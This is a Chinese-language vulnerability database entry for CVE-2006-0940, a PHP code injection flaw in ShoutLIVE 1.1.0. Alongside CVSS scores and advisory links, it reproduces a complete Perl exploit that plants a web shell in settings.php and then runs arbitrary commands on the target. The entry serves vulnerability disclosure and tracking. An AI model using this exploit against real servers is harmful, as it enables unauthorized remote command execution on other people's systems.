CVE-2006-0940
CVSS7.5
发布时间 :2006-02-28 21:02:00
修订时间 :2011-03-07 21:31:10
NMCOE    

[原文]Multiple direct static code injection vulnerabilities in savesettings.php in ShoutLIVE 1.1.0 allow remote attackers to execute arbitrary PHP code via variables that are written to settings.php.


[CNNVD]ShoutLIVE ‘savesettings.php’ 直接静态代码注入漏洞(CNNVD-200602-423)

        ShoutLIVE 1.1.0的savesettings.php中存在多个直接静态代码注入漏洞。远程攻击者可以借助写入settings.php的变量执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0940
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0940
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-423
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0755
(UNKNOWN)  VUPEN  ADV-2006-0755
http://www.osvdb.org/23482
(UNKNOWN)  OSVDB  23482
http://secunia.com/advisories/19047
(VENDOR_ADVISORY)  SECUNIA  19047
http://evuln.com/vulns/87/summary.html
(VENDOR_ADVISORY)  MISC  http://evuln.com/vulns/87/summary.html
http://xforce.iss.net/xforce/xfdb/24897
(UNKNOWN)  XF  shoutlive-savesettings-file-include(24897)
http://www.securityfocus.com/bid/16857
(UNKNOWN)  BID  16857
http://www.securityfocus.com/archive/1/archive/1/426985/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 [eVuln] ShoutLIVE PHP Code Execution & Multiple XSS Vulnerabilities
http://securityreason.com/securityalert/557
(UNKNOWN)  SREASON  557

- 漏洞信息

ShoutLIVE ‘savesettings.php’ 直接静态代码注入漏洞
高危 输入验证
2006-02-28 00:00:00 2006-03-01 00:00:00
远程  
        ShoutLIVE 1.1.0的savesettings.php中存在多个直接静态代码注入漏洞。远程攻击者可以借助写入settings.php的变量执行任意PHP代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1590)

ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit (EDBID:1590)
php webapps
2006-03-18 Verified
0 DarkFig
N/A [点击下载]
#!/usr/bin/perl
##################################################
# ShoutLIVE <= 1.1.0 Remote Php Code Execution
# Based on: http://www.frsirt.com/bulletins/4109
# Credits: Coded by DarkFig
# Website: http://disarm.free.fr/bo_hard/
# Greetz: All AcidRoot/Bod members =)
##################################################
use IO::Socket;
use LWP::Simple;

if(!$ARGV[1]){headers();
print "\n| Usage: perl shoutlive110.pl <host> <path>   |
+---------------------------------------------+
| Coded by DarkFig |
+------------------+
";exit}

sub headers() {
print "\n
+----------------------------------------------+
| ShoutLIVE <= 1.1.0 Remote Php Code Execution |
+----------------------------------------------+";}

$host = $ARGV[0];
$path = $ARGV[1];
headers();
$ncon = "\n [-]Can't connect to $host...";
$ycon = "\n [+]Connected to $host...";
$sdat = "\n [~]Sending malicious request...";
$ycmd = "\n [+]System command writed...";
$req1 = "send_email=0\" ?> <? \$cmd = \$_GET\['cmd']; system(\$cmd); ?> <? #";
$lgr1 = length $req1;
$psti = "$path"."savesettings.php";

my $sock = new IO::Socket::INET(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die "$ncon";
print "$ycon"."$sdat";
print $sock "POST $psti HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $lgr1

$req1\n";
close($sock);
print "$ycmd";

while(1 ne 2){
print "\n [$host]\$ ";chomp($cmd = <STDIN>);
if($cmd eq "exit"){eofi();}
$req2 = "http://"."$host"."$path"."settings.php"."?cmd="."$cmd";
$page = get($req2) or die "$ncon";
print $page;}

sub eofi() {
print "+----------------------------------------------+
|     Coded by DarkFig : [*BoD*]_AcidRoot      |
+----------------------------------------------+\n";exit;}

# milw0rm.com [2006-03-18]
		

- 漏洞信息

23482
ShoutLIVE savesettings.php Multiple Field Arbitrary PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

ShoutLIVE contains a flaw that may allow a malicious user to execute arbitrary code on the server. The issue is triggered because the application does not verify all input supplied to the 'settings.php' script. It is possible that the flaw may allow an attacker to inject PHP code in these fields which is then executed on the server, resulting in a loss of integrity.

- 时间线

2006-02-24 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站